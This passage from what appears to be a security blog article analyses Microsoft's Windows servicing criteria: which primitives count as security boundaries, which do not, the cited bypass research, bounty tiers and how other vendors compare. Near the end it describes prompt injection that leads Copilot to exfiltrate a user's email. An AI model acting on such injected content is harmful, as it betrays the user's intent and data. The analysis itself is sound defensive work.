&lt;p&gt;&lt;strong&gt;Primitive.&lt;/strong&gt; The System Managed Administrator Account (SMAA) sits in the SAM database with its own SID, profile, and home directory. The &lt;code&gt;appinfo.dll&lt;/code&gt; consent service authorises SMAA-scoped elevation via Windows Hello. When a user requests an elevation, &lt;code&gt;appinfo.dll&lt;/code&gt; walks the Windows Hello flow, the SMAA token is created in a fresh logon session, the elevated process runs, and the token is destroyed when the process exits [@ms-learn-admin-protection].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Violation.&lt;/strong&gt; A standard-user process obtains the SMAA&apos;s elevated token without Windows Hello consent, typically by exploiting a primitive in the elevation path that lets the attacker substitute their own controlled object for one the SMAA elevation flow expects to create.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Case study.&lt;/strong&gt; James Forshaw&apos;s January 2026 nine pre-GA Administrator Protection bypass series, disclosed via the Project Zero issue tracker [@pz-tracker-432313668]. The canonical illustration is the &quot;lazy DOS device directory hijack&quot; (Project Zero issue 432313668): DOS device object directories are created on demand for each logon session rather than at session creation time, and an attacker can race the SMAA elevation flow to create the directory first, with attacker-controlled permissions. Microsoft fixed all nine pre-GA -- not &quot;by design&quot;-replied. The boundary classification is operationally enforced.&lt;/p&gt;

flowchart TB
    subgraph Network[&quot;Network boundary&quot;]
        Remote[&quot;Remote / unauthenticated attacker&quot;]
    end
    subgraph Hypervisor[&quot;Hyper-V root partition&quot;]
        subgraph Guest[&quot;L1 guest VM&quot;]
            subgraph VTL0[&quot;VTL0 (normal kernel)&quot;]
                Kernel[&quot;Kernel mode&quot;]
                subgraph Session1[&quot;Session 1+ interactive&quot;]
                    subgraph User[&quot;Per-user identity&quot;]
                        ProcA[&quot;Process A&quot;]
                        ProcB[&quot;Process B&quot;]
                        subgraph AppC[&quot;AppContainer / LowBox&quot;]
                            Sandbox[&quot;Sandboxed renderer&quot;]
                        end
                    end
                end
                subgraph Session0[&quot;Session 0 services&quot;]
                    Svc[&quot;SYSTEM services&quot;]
                end
                subgraph AP[&quot;Administrator Protection elevation path&quot;]
                    SMAA[&quot;SMAA token&quot;]
                end
            end
            subgraph VTL1[&quot;VTL1 (Secure Kernel + IUM)&quot;]
                Trustlet[&quot;LsaIso Trustlet&quot;]
            end
        end
    end
    Remote -.-&amp;gt;|&quot;Network boundary&quot;| Kernel
    ProcA -.-&amp;gt;|&quot;Process boundary&quot;| ProcB
    Session1 -.-&amp;gt;|&quot;Session boundary&quot;| Session0
    Sandbox -.-&amp;gt;|&quot;AppContainer boundary&quot;| ProcA
    Kernel -.-&amp;gt;|&quot;VTL boundary&quot;| Trustlet
    ProcA -.-&amp;gt;|&quot;Administrator Protection boundary&quot;| SMAA
&lt;p&gt;Nine boundaries. Every one of them backed by a real architectural primitive, every one of them carrying a documented violation history. But the doctrine is only half a table. The other half is the table of primitives Microsoft has &lt;em&gt;explicitly&lt;/em&gt; chosen not to commit to.&lt;/p&gt;
&lt;h2&gt;8. What Is Not a Boundary&lt;/h2&gt;
&lt;p&gt;For every primitive on the boundary list, there is a primitive Microsoft has named in the same document and chosen &lt;em&gt;not&lt;/em&gt; to commit to. The seven entries, with the structural reason for each classification.&lt;/p&gt;
&lt;h3&gt;8.1 UAC&lt;/h3&gt;
&lt;p&gt;Russinovich&apos;s June 2007 sentence is the doctrinal source: &lt;em&gt;&quot;UAC elevations are conveniences and not security boundaries&quot;&lt;/em&gt; [@russinovich-vista-uac-wayback]. The structural reason is the shared-resources model -- same SID, same profile, same logon session, same DOS device object directory between the standard-user and elevated tokens. UACMe is the operational catalogue: more than 80 documented auto-elevation methods, zero CVEs [@uacme]. The reply to a UAC bypass report is &quot;by design, please refer to the servicing criteria,&quot; and that reply is operationally correct.&lt;/p&gt;
&lt;h3&gt;8.2 Driver Signing / Code Integrity / KMCS&lt;/h3&gt;
&lt;p&gt;Local administrator can, by design, install drivers. Once a driver is installed, it runs in kernel mode. Classifying admin-to-kernel as a boundary would require redesigning the Administrators group itself. The downstream operational consequence is the &lt;a href=&quot;https://paragmali.com/blog/windows-kernel-code-integrity-2006-2026/&quot; rel=&quot;noopener&quot;&gt;BYOVD attack family&lt;/a&gt;: an administrator installs a legitimately-signed driver with an exploitable vulnerability and uses the driver to obtain arbitrary kernel-mode code execution. Microsoft maintains the &lt;em&gt;Vulnerable Driver Blocklist&lt;/em&gt; as feature hardening, and the Windows Defender Application Control (WDAC) infrastructure as a tighter enforcement option, but those are features layered over a primitive Microsoft has not classified as a boundary [@leviev-downdate-update].&lt;/p&gt;
&lt;h3&gt;8.3 Microsoft Defender / Antimalware&lt;/h3&gt;
&lt;p&gt;A heuristic detection layer cannot, by construction, be a boundary. Antivirus operates by recognising patterns -- signature, behaviour, reputation -- and an adversary tuning a payload against those patterns can always find a path that the detector does not recognise.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A boundary requires that &quot;security policy dictates what can pass through.&quot; Heuristic detection cannot meet that requirement. There is no policy oracle that can decide, in finite time with finite memory, whether an arbitrary binary will exhibit malicious behaviour. The decision problem is undecidable in the general case (Rice&apos;s theorem); in practice antivirus is a probabilistic filter, not a guarantee. Microsoft&apos;s classification of Defender as a feature acknowledges this constraint. Defender will be improved, hardened, and updated -- but the doctrine does not promise that it will &lt;em&gt;catch&lt;/em&gt; any specific malware. Bypassing Defender is expected and continuous, and a Defender-bypass report on its own does not earn a CVE.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Tavis Ormandy&apos;s 2014 to 2017 Defender disclosures earned CVEs not because they bypassed Defender&apos;s detection but because they crossed &lt;em&gt;other&lt;/em&gt; boundaries [@ms-advisory-4022344]. The bugs were memory-corruption primitives in the Defender parsing engine reachable from attacker-controlled inputs the engine fetched from email or web traffic. The flagship example is CVE-2017-0290, the &lt;em&gt;crazy bad&lt;/em&gt; MsMpEng RCE Microsoft addressed with out-of-band Security Advisory 4022344 on May 8, 2017 [@ms-advisory-4022344]. The network boundary crossing is what earned the CVE.This is the operational lesson for anyone reporting a Defender finding: lead with the boundary, not the feature. If your bypass is a clever signature evasion, expect a &quot;by design&quot; reply. If your bypass is a parsing-engine memory-corruption primitive that fires from attacker-controlled input arriving over the network, that is a network-boundary crossing and you have a CVE-eligible report.&lt;/p&gt;
&lt;h3&gt;8.4 HVCI / Memory Integrity&lt;/h3&gt;
&lt;p&gt;The doctrinally subtle one. &lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;HVCI&lt;/a&gt; is the kernel-mode code integrity check that lives &lt;em&gt;inside&lt;/em&gt; VTL1, running under the protection of the hypervisor. The VTL boundary is what protects HVCI from attacker tampering. HVCI itself is a &lt;em&gt;feature&lt;/em&gt; enforced &lt;em&gt;at&lt;/em&gt; the VTL boundary, not a boundary in its own right.&lt;/p&gt;
&lt;p&gt;The operational consequence: an HVCI bypass that does not also cross VTL0 to VTL1 is a feature defeat. Critical-severity HVCI bypasses may still ship as security updates through the exception clause -- but the primary disposition path is feature-hardening rather than boundary-servicing. Microsoft&apos;s &lt;em&gt;Virtualization-based protection of code integrity&lt;/em&gt; page documents the architecture in detail and is the canonical reference [@ms-learn-vbs-ci].&lt;/p&gt;
&lt;h3&gt;8.5 Protected Process Light (PPL)&lt;/h3&gt;
&lt;p&gt;Introduced in Windows 8.1 to protect anti-malware services and other specially-signed processes from administrator tampering [@ms-learn-am-ppl]. PPL uses code integrity to refuse unsigned code injection into protected processes, and refuses termination requests even from administrators.&lt;/p&gt;
&lt;p&gt;Gabriel Landau&apos;s PPLFault chain demonstrated loading unsigned code into a PPL process by racing the kernel&apos;s signature check against attacker-controlled storage during catalog load -- the False File Immutability primitive [@landau-pplfault], [@landau-ffi-elastic]. Microsoft&apos;s response was the Canary build 25941 mitigation on September 1, 2023 -- feature hardening that ships out-of-cycle when the impact warrants it, &lt;em&gt;not&lt;/em&gt; boundary-class servicing. Landau&apos;s article preserves the verbatim MSRC position.&lt;/p&gt;

The PPL mechanism was introduced in Windows 8.1, enabling specially-signed programs to run in such a way that they are protected from tampering and termination, even by administrative processes ... Microsoft does not consider PPL to be a security boundary, meaning they won&apos;t prioritize security patches for code-execution vulnerabilities discovered therein, but they have historically addressed some such vulnerabilities on a less-urgent basis. -- Gabriel Landau, Elastic Security Labs, September 2023 [@landau-pplfault]
&lt;h3&gt;8.6 Administrator-to-kernel privilege escalation&lt;/h3&gt;
&lt;p&gt;The structural impossibility argument applies cleanly here. By Saltzer-Schroeder&apos;s &lt;em&gt;complete mediation&lt;/em&gt; principle [@saltzer-schroeder-mit], a boundary requires that every access through it be mediated by policy. Administrators are policy-authorised to load drivers; drivers run in kernel mode; therefore admin-to-kernel is the &lt;em&gt;expected&lt;/em&gt; operation, not a policy violation. Reclassifying this as a boundary would mean redesigning the Administrators group itself.&lt;/p&gt;
&lt;p&gt;The Landau &lt;em&gt;ItsNotASecurityBoundary&lt;/em&gt; GitHub repository name is an explicit homage to this Microsoft policy [@landau-itsnotasb-gh]. The repository&apos;s research extends False File Immutability into kernel space: the Windows Code Integrity subsystem (&lt;code&gt;ci.dll&lt;/code&gt;) is itself susceptible to FFI, letting an attacker who controls a catalog file on attacker-controlled storage race the CI signature check and then load unsigned drivers. Microsoft fixed the specific FFI primitive but did not move the admin-to-kernel classification.&lt;/p&gt;
&lt;p&gt;Alon Leviev&apos;s Windows Downdate is the recent flagship demonstration. Microsoft assigned CVE-2024-21302 to the chain because it crossed the VTL boundary; the underlying Windows Update takeover -- the admin-to-kernel piece -- remained unpatched [@leviev-downdate-update]. The classification stood. Specific chains earn CVEs when they cross another boundary; the primitive itself does not become a boundary by accumulation of exploitation evidence.&lt;/p&gt;

While CVE-2024-21302 was patched because it crossed a defined security boundary, the Windows Update takeover which was reported to Microsoft as well, has remained unpatched, as it did not cross a defined security boundary. Gaining kernel code execution as an Administrator is not considered as crossing a security boundary (not a vulnerability). -- Alon Leviev, SafeBreach Labs, October 26, 2024 [@leviev-downdate-update]
&lt;h3&gt;8.7 Same-user post-authentication&lt;/h3&gt;
&lt;p&gt;The most recent addition to the feature table, articulated by James Forshaw in &lt;em&gt;Working your way Around an ACL&lt;/em&gt; (June 3, 2024). Once a process has executed under a user&apos;s session, it inherits the user&apos;s trust. Per-process isolation within the same user is not a declared boundary. Forshaw&apos;s verbatim formulation: &lt;em&gt;&quot;any privilege escalation (or non-security boundary &lt;em&gt;cough&lt;/em&gt;) is sufficient to leak the information&quot;&lt;/em&gt; [@forshaw-tyranid-acl].&lt;/p&gt;
&lt;p&gt;The operational stakes here are higher than they look. AI-mediated features like Windows 11 Recall continuously record sensitive user state into a same-user-readable database. If same-user is not a boundary, every non-PPL local process under the same user identity can read that database. The &quot;ACLed to SYSTEM&quot; mitigation that protects the Recall storage is operationally weak under the doctrine, because &lt;em&gt;any&lt;/em&gt; same-user privilege escalation -- including the entire UACMe catalogue, all of the same-user-post-authentication footguns, and every UI-Access trick -- is a sufficient predicate.&lt;/p&gt;

flowchart TD
    Report[&quot;Vulnerability report arrives&quot;]
    Cls{&quot;Classify primitive&quot;}
    BdyQ2{&quot;Boundary path: severity Critical or Important?&quot;}
    FtrQ2{&quot;Feature path: severity Critical or Important?&quot;}
    Excp{&quot;Exception applies?&quot;}
    SvcBdy[&quot;Boundary servicing: Patch Tuesday CVE&quot;]
    SvcFtr[&quot;Feature servicing: Patch Tuesday CVE (Q2 yes path)&quot;]
    SvcExc[&quot;Exception servicing: feature hardening, possible bulletin&quot;]
    Defer[&quot;By design / consider for next version&quot;]
    Report --&amp;gt; Cls
    Cls -- &quot;Boundary&quot; --&amp;gt; BdyQ2
    Cls -- &quot;Feature&quot; --&amp;gt; FtrQ2
    BdyQ2 -- &quot;Yes&quot; --&amp;gt; SvcBdy
    BdyQ2 -- &quot;No&quot; --&amp;gt; Excp
    FtrQ2 -- &quot;Yes&quot; --&amp;gt; SvcFtr
    FtrQ2 -- &quot;No&quot; --&amp;gt; Excp
    Excp -- &quot;Yes&quot; --&amp;gt; SvcExc
    Excp -- &quot;No&quot; --&amp;gt; Defer
&lt;p&gt;The central insight: the not-a-boundary table is &lt;em&gt;not&lt;/em&gt; a list of bugs Microsoft has not gotten around to fixing. It is a list of primitives Microsoft has &lt;em&gt;deliberately&lt;/em&gt; chosen not to commit to, because guaranteeing those primitives as boundaries would require either reorganising the architecture (admin-to-kernel) or operating against an inherent impossibility (heuristic detection cannot guarantee detection).&lt;/p&gt;
&lt;p&gt;Nine boundaries that Microsoft commits to. Seven features Microsoft hardens but does not commit to. One remaining structural artifact ties the two together: the bounty schedule.&lt;/p&gt;
&lt;h2&gt;9. The Bounty Schedule Mirrors the Boundary List&lt;/h2&gt;
&lt;p&gt;If you wanted a market-side confirmation that the boundary list is the operational anchor, you would look at the bounty schedule. The two documents are mechanically linked.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Bounty program&lt;/th&gt;
&lt;th&gt;Payout range&lt;/th&gt;
&lt;th&gt;Primary boundary (or boundaries)&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Microsoft Hyper-V Bounty Program&lt;/td&gt;
&lt;td&gt;$5,000 to $250,000 USD&lt;/td&gt;
&lt;td&gt;Virtual machine (guest-to-host)&lt;/td&gt;
&lt;td&gt;[@msrc-bounty-hyperv]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windows Insider Preview Bounty Program&lt;/td&gt;
&lt;td&gt;$500 to $100,000 USD&lt;/td&gt;
&lt;td&gt;Kernel, network, sandbox, VBS / VTL&lt;/td&gt;
&lt;td&gt;[@msrc-bounty-wip]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft Edge Bounty Program&lt;/td&gt;
&lt;td&gt;$250 to $30,000 USD&lt;/td&gt;
&lt;td&gt;AppContainer / sandbox, network&lt;/td&gt;
&lt;td&gt;[@msrc-bounty-edge]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft Bounty Programs (landing)&lt;/td&gt;
&lt;td&gt;Varies by program&lt;/td&gt;
&lt;td&gt;Identity, Cloud, M365, Azure (cloud-side boundaries)&lt;/td&gt;
&lt;td&gt;[@msrc-bounty-root]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Standalone UAC bypass bounty&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;(UAC is on the feature list, no bounty)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Hyper-V is the highest payout.&lt;/strong&gt; Up to $250,000 USD for a guest-to-host escape, which is the largest single-finding payout in the Microsoft bounty catalogue [@msrc-bounty-hyperv]. The program&apos;s verbatim definition of an eligible submission is a remote-code-execution vulnerability that lets an L1 guest virtual machine compromise the hypervisor, escape from the guest to the host, or escape to another L1 guest. That maps directly to the VM boundary on the servicing-criteria table. The market signal is unambiguous: the boundary whose violation matters the most pays the most.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Windows Insider Preview is the kernel / network / VBS catch-all.&lt;/strong&gt; Up to $100,000 USD for vulnerabilities found on the latest Canary Channel build, with the eligibility requirement that the vulnerability &quot;must be Critical or Important severity as defined in the Microsoft Vulnerability Severity Classification for Windows&quot; [@msrc-bounty-wip]. That severity requirement is the &lt;em&gt;Question 2&lt;/em&gt; gate from the two-question rule, written directly into the bounty&apos;s eligibility clause. The bounty program inherits Question 2 mechanically.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Microsoft Edge is the sandbox program.&lt;/strong&gt; Up to $30,000 USD for Edge-unique vulnerabilities (not reproducing on the equivalent Google Chrome channel) in the Dev, Beta, or Stable channels [@msrc-bounty-edge]. The &quot;unique to Edge&quot; requirement reflects that Chromium engine bugs upstream are Google Chrome&apos;s bounty scope; the Microsoft Edge program covers the Edge-specific shell, AppContainer integration, and Windows integration code.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The absence of a UAC bounty.&lt;/strong&gt; There is no standalone UAC bypass bounty program. Not because Microsoft does not care about UAC bypasses, but because UAC is not on the boundary list -- the market signal follows the doctrine.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The bounty schedule is the most reliable cross-check available for the boundary list. Reading the bounty page is a reasonable proxy for reading the boundary list, because Microsoft only pays for findings that violate primitives the company has committed to defending. The absence of a UAC bounty, the presence of a $250,000 Hyper-V tier, and the Critical-or-Important severity gate baked into the Windows Insider Preview bounty are all consequences of the servicing-criteria classification. The classification drives the payout. The payout reveals the classification.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The mapping is &lt;em&gt;dominantly&lt;/em&gt; tight, not &lt;em&gt;strictly&lt;/em&gt; tight. The exception clause from the servicing criteria applies here too: a sufficiently impactful feature defeat may receive an out-of-band bounty under the broader Microsoft Bounty Programs umbrella [@msrc-bounty-root]. But the structural mapping is consistent enough that the bounty page is a fair proxy for the classification.&lt;/p&gt;
&lt;p&gt;You have now read the doctrine in full. Two tables, one rule, one bounty overlay. The next question is the one the doctrine itself cannot answer: where are the gaps?&lt;/p&gt;
&lt;h2&gt;10. What the Doctrine Cannot Decide&lt;/h2&gt;
&lt;p&gt;The doctrine is the most enumerated vulnerability-classification policy any major OS vendor has published. It still has gray zones.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Resourcing versus security.&lt;/strong&gt; Microsoft&apos;s admin-to-kernel position is at least partly a &lt;em&gt;resourcing&lt;/em&gt; decision: finite engineering capacity to harden the admin elevation path. The structural impossibility argument (admin loads drivers; drivers run in kernel) is genuine, but it does not by itself force the classification -- a sufficiently invasive architectural change (sealed-system mode; VTL Enclaves hosting the entire kernel) could in principle move the line. What &quot;guaranteed by Windows&quot; means in a model that admits BYOVD, Windows Downdate, and False File Immutability is a question reasonable researchers can disagree on.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Severity-meets-bar as the second filter.&lt;/strong&gt; Two findings that cross the same boundary can receive different fates depending on Question 2. The Bug Bar [@msrc-bugbar] documents the &lt;em&gt;types&lt;/em&gt; of severity (RCE, EoP, info disclosure, DoS, spoofing, tampering) and the &lt;em&gt;pivots&lt;/em&gt; (server vs client; default-on vs default-off; user interaction required vs not), but the thresholds within each type are not exhaustively published. A researcher who knows the boundary list still cannot, from the document alone, predict severity to single-step accuracy.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The &quot;exceptions may be made&quot; clause.&lt;/strong&gt; The doctrine itself admits exceptions exist. PPLFault shipped a feature-hardening mitigation in Canary build 25941 [@landau-pplfault] even though PPL is a feature; CVE-2024-21302 received a Patch Tuesday bulletin even though the underlying admin-to-kernel primitive remained on the feature side [@leviev-downdate-update]. Researchers cannot fully predict the MSRC reply from the document alone; the exception clause is structural relief, not an edge case.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Boundary classification of paths, not just components.&lt;/strong&gt; Administrator Protection is the elevation &lt;em&gt;path&lt;/em&gt;, not the account [@ms-learn-admin-protection]. Admin-to-kernel via driver load is still not a boundary even when the elevation path is. The two coexist: a researcher who finds a way for a standard-user process to obtain an SMAA elevated token without consent has a CVE-eligible boundary crossing; a researcher who finds a way for an &lt;em&gt;administrator&lt;/em&gt; process to install a vulnerable driver and pivot to kernel has a feature defeat.&lt;/p&gt;

Saltzer and Schroeder&apos;s 1975 *The Protection of Information in Computer Systems* [@saltzer-schroeder-mit] articulates the *open design* principle: the security design should be public, &quot;the mechanisms should not depend on the ignorance of potential attackers.&quot; A published classification doctrine like Microsoft&apos;s satisfies open design. Their *complete mediation* principle is the other constraint at work: a boundary requires that every access through it be mediated by policy. The Microsoft doctrine lives precisely in the gap between *enumerable* (an upper bound: a published doctrine must list the boundaries it commits to) and *complete* (a lower bound: no doctrine can list every primitive that will ever matter). The &quot;exceptions may be made&quot; clause is the doctrine&apos;s explicit acknowledgment of the gap.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The doctrine does not promise that every reported finding will be serviced. It does not promise that severity thresholds are publicly enumerated to single-step accuracy. It does not promise that the boundary list will not grow or contract. It does not promise that two reports against the same primitive at the same severity will receive identical disposition. What it promises is that the &lt;em&gt;classification half&lt;/em&gt; of the triage will follow the published list, and that the &lt;em&gt;exception clause&lt;/em&gt; exists as the explicit relief valve when the published list does not fit. The promise is procedural, not absolute. That procedural promise is what makes the doctrine more legible than any comparable vendor policy.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Microsoft&apos;s doctrine has gray zones -- but it has more enumerated certainty than any comparable doctrine. How does it compare to Apple&apos;s, Chromium&apos;s, Mozilla&apos;s, and the Linux kernel&apos;s?&lt;/p&gt;
&lt;h2&gt;11. How Other Vendors Classify the Same Primitives&lt;/h2&gt;
&lt;p&gt;Microsoft&apos;s document is one of five major published doctrines. Each draws the line differently.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Vendor&lt;/th&gt;
&lt;th&gt;Taxonomic structure&lt;/th&gt;
&lt;th&gt;Primary URL&lt;/th&gt;
&lt;th&gt;Example divergence from Microsoft&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Microsoft&lt;/td&gt;
&lt;td&gt;Enumerated boundary + feature tables; two-question rule&lt;/td&gt;
&lt;td&gt;[@msrc-criteria]&lt;/td&gt;
&lt;td&gt;The Microsoft baseline&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Apple (macOS / iOS)&lt;/td&gt;
&lt;td&gt;Architectural-by-section; sealed system + SIP&lt;/td&gt;
&lt;td&gt;[@apple-platform-security]&lt;/td&gt;
&lt;td&gt;SIP classifies admin-to-OS-modification as a boundary&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Chromium&lt;/td&gt;
&lt;td&gt;Design-time &lt;em&gt;Rule of 2&lt;/em&gt;; severity guidelines for triage&lt;/td&gt;
&lt;td&gt;[@chromium-rule-of-2]&lt;/td&gt;
&lt;td&gt;Design-time pre-commitment, not post-hoc classification&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mozilla&lt;/td&gt;
&lt;td&gt;sec-rating (sec-critical / sec-high / sec-moderate / sec-low)&lt;/td&gt;
&lt;td&gt;[@mozilla-client-bounty]&lt;/td&gt;
&lt;td&gt;Severity-only, no primitive enumeration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux&lt;/td&gt;
&lt;td&gt;Per-subsystem implicit classification&lt;/td&gt;
&lt;td&gt;[@linux-security-bugs]&lt;/td&gt;
&lt;td&gt;No central table; maintainer-driven&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Apple&apos;s Platform Security Guide.&lt;/strong&gt; A sealed-system / Signed System Volume model with stricter user/kernel separation. macOS System Integrity Protection (SIP) restricts the root user account and limits the actions root may perform on protected parts of the OS [@apple-sip-ht204899]. Some admin-to-system-modification paths that Windows classifies as features (Driver Signing, Code Integrity, admin-to-kernel) are classified by SIP as boundaries the OS protects against modification, &lt;em&gt;including&lt;/em&gt; by the local administrator. The Apple guide is less enumerated than Microsoft&apos;s -- it organises by section rather than by table -- but it commits to architectural separations that the open-driver-loading Windows model cannot match [@apple-platform-security].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Chromium&apos;s Rule of 2 plus Severity Guidelines.&lt;/strong&gt; A &lt;em&gt;design-time&lt;/em&gt; pre-commitment, fundamentally different from Microsoft&apos;s post-hoc triage. The Rule of 2 states: &lt;em&gt;&quot;When you write code to parse, evaluate, or otherwise handle untrustworthy inputs from the Internet ... Pick no more than 2 of: untrustworthy inputs; unsafe implementation language; and high privilege&quot;&lt;/em&gt; [@chromium-rule-of-2]. Code that violates the rule must be sandboxed before it ships. Site isolation (each origin in its own renderer process) is the operational boundary equivalent. The Severity Guidelines parameterise triage with a Critical (S0) / High / Medium / Low scheme [@chromium-severity-guidelines].The Chromium Rule of 2 and Microsoft&apos;s servicing criteria are not substitutes -- they live at different layers. The Rule of 2 is an &lt;em&gt;engineering&lt;/em&gt; rule that forecloses entire vulnerability classes at design time. The Microsoft doctrine is a &lt;em&gt;triage&lt;/em&gt; rule that classifies findings at disclosure time. A Chromium project can adopt both, and Microsoft Edge does.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Mozilla&apos;s Client Bug Bounty Program.&lt;/strong&gt; A severity-only rating: sec-critical, sec-high, sec-moderate, sec-low. The bounty page states verbatim: &lt;em&gt;&quot;Typically, the security rating given by the Bounty Committee for a bug must be rated a &apos;sec-high&apos; or &apos;sec-critical&apos; in order for it to be eligible for a bounty&quot;&lt;/em&gt; [@mozilla-client-bounty]. There is no published boundary enumeration. The Bounty Committee&apos;s judgment is the deciding factor.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Linux kernel security-bugs process.&lt;/strong&gt; Per-subsystem, not per-boundary. The verbatim policy: &lt;em&gt;&quot;By definition if an issue cannot be reproduced, it is not exploitable, thus it is not a security bug&quot;&lt;/em&gt; [@linux-security-bugs]. CVE assignment runs through the kernel&apos;s CVE Numbering Authority since 2024. There is no Linux equivalent of the MSRC servicing-criteria document; classification is implicit in the maintainer&apos;s response.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s document is the most enumerated, most operationally legible vulnerability-classification doctrine published by any major OS vendor. That legibility is itself a vendor commitment, and is what makes &quot;by design&quot; a predictable answer rather than an arbitrary one. All five doctrines agree that boundaries exist. They disagree on which primitives count, how to enumerate them, and how to communicate the result. Microsoft has chosen the most-enumerated point in that gap. The next question is whether the enumeration will keep growing.&lt;/p&gt;
&lt;h2&gt;12. The 2026 Frontier&lt;/h2&gt;
&lt;p&gt;The boundary list grew by accretion for twenty years. Four pressures are pushing the next additions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cloud-side boundaries.&lt;/strong&gt; Conditional Access policy enforcement (Microsoft Entra), the Primary Refresh Token (PRT), and the Microsoft 365 service boundary that Copilot operates within. These are not currently in the Windows servicing criteria -- they are governed by separate MSRC documents and per-product bounty programs [@msrc-bounty-root]. Modern Windows attack chains routinely involve both client-side (Windows) and cloud-side (Entra / Azure) primitives. A finding that crosses a &lt;em&gt;cloud-side&lt;/em&gt; boundary may or may not also cross a &lt;em&gt;client-side&lt;/em&gt; boundary, and the Windows document does not yet arbitrate.&lt;/p&gt;
&lt;p&gt;The open question is whether the Windows servicing criteria document will expand to cover cloud-side primitives, or whether a parallel &lt;em&gt;Microsoft Identity Security Servicing Criteria&lt;/em&gt; document will appear. The bounty pages function as a &lt;em&gt;derived&lt;/em&gt; boundary list today -- reading them tells a researcher which cloud-side primitives Microsoft commits to servicing -- but the unified document does not yet exist.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Agentic / AI-mediated privilege expansion.&lt;/strong&gt; Copilot in Windows and Copilot for Microsoft 365 can take actions on behalf of a user. Prompt injection from untrusted content can cause Copilot to perform actions the user did not intend. Is that a boundary crossing?&lt;/p&gt;

A prompt-injected Copilot action operates *within* the user&apos;s identity and the user&apos;s authorisations. By the same-user-post-authentication classification, that should be a feature defeat, not a boundary crossing. But the *intent* the user expressed (summarise my email; do not exfiltrate it) is defeated by the injected prompt. The doctrine was designed to classify primitives in terms of policy-enforced separations, not in terms of user-intent-vs-attacker-intent. The MITRE ATT&amp;amp;CK framework has begun to enumerate prompt-injection-class techniques [@mitre-attack]; the Microsoft document has not yet. Whichever way Microsoft decides -- a new boundary entry, a new feature entry, or a deferral -- will be the most consequential doctrinal move since the 2025 Administrator Protection addition.
&lt;p&gt;&lt;strong&gt;Administrator Protection rollout resumption.&lt;/strong&gt; The December 2025 revert was an application-compatibility decision; the boundary classification stands [@ms-learn-admin-protection]. What would have to be true for the rollout to resume: Win32 application compatibility validated across the long tail, Visual Studio elevation flows verified, the WebView2 installer regression resolved [@ms-blogs-admin-protection-dev]. What stays the same when it does: Forshaw&apos;s nine pre-GA bypasses all fixed; the elevation path still on the boundary side.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Same-user as a possible new boundary.&lt;/strong&gt; The Recall disclosure and the broader same-user post-authentication class push on this question. The community position, articulated by Forshaw, is that same-user should not be expected to be a boundary [@forshaw-tyranid-acl]. Microsoft&apos;s response has been &lt;em&gt;feature hardening&lt;/em&gt; (Personal Data Encryption, VTL Enclave use) rather than reclassification.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If VTL Enclaves and Personal Data Encryption become a per-user attestable substrate -- a per-user equivalent of VTL1 -- then &lt;em&gt;same-user&lt;/em&gt; could become a boundary in the same way &lt;em&gt;user-to-user&lt;/em&gt; already is. The structural ingredient that VTL1 added to the user boundary (hypervisor-mediated separation that even SYSTEM cannot cross) would be added to a per-process scope within a user&apos;s identity. This is a research-track conjecture, not a Microsoft commitment; no public Microsoft statement has confirmed the direction. But the &lt;em&gt;shape&lt;/em&gt; of how same-user could become a boundary is now legible, in a way it was not before Administrator Protection demonstrated that re-using an existing boundary (user-to-user) for a new primitive (the SMAA elevation path) is a viable engineering pattern.&lt;/p&gt;
&lt;/blockquote&gt;

flowchart LR
